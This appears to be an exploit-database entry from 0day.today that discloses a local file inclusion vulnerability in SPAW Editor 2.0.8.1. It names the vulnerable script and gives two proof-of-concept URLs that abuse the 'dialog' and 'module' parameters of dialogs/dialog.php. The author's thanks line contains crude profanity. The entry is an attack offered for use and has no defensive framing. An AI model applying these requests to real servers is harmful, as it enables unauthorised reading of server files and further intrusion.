id: 14366
date: 10/06/2010
title: SPAW Editor 2.0.8.1 Local File Inclusion Vulnerability
author: soorakh kos
cves: 

======================================================
SPAW Editor 2.0.8.1 Local File Inclusion Vulnerability
======================================================

# Exploit Title: local file include
# Date:
# Author: soorakh kos
 
# Software Link: http://sourceforge.net/projects/spaw/files/spaw-php/SPAW%20PHP%20v.2.0.8.1/spaw-php-2081-gpl.zip/download
 
# Version: SPAW Editor v.2
 
# Thanks:  kose roya , kose soosan , kose amam,kose dokhtar amam ,and all jaghi iranian boys
-----------
 
 
vul code: /path/dialogs/dialog.php
 
------------------------------------------------
 
poc:
/path/dialogs/dialog.php?dialog=lfi
/path/dialogs/dialog.php?module=lfi



#  0day.today [2023-03-22]  #